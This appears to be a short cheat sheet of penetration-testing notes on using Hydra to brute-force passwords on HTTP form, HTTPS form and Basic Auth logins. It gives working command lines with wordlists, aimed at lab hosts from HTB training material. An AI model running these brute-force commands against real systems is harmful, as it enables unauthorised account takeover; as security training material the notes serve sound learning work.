Hydra

Usage

HTTP

For HTML form-based authentication:

hydra example.com -s 8000 -l admin -P rockyou.txt http-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">' -f -u

HTTPS

hydra -L users -P passwords streamio.htb https-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="alert alert-danger">' -I

Basic Auth

For standard HTTP Basic Auth (401 response plus WWW-Authenticate: Basic header):

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt <ip-address> http-get /admin

Example

The below example has been taken from the Web Enumeration & Exploitation of HTB's Attacking Enterprise Networks module.

We find an HTTP login form (Figure 1), attempt a failed login, and select something unique from the source code of the HTTP response (Figure 2).

Figure 1: An HTTP login form.

Figure 2: A unique string within the source code of a failed login attempt.

Then, we pass this information to hydra and perform the against the login form (Figure 3).

hydra -l admin -P /usr/share/wordlists/rockyou.txt monitoring.inlanefreight.local http-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">' -f -u

Figure 3: Performing a BFA on an HTTP login form.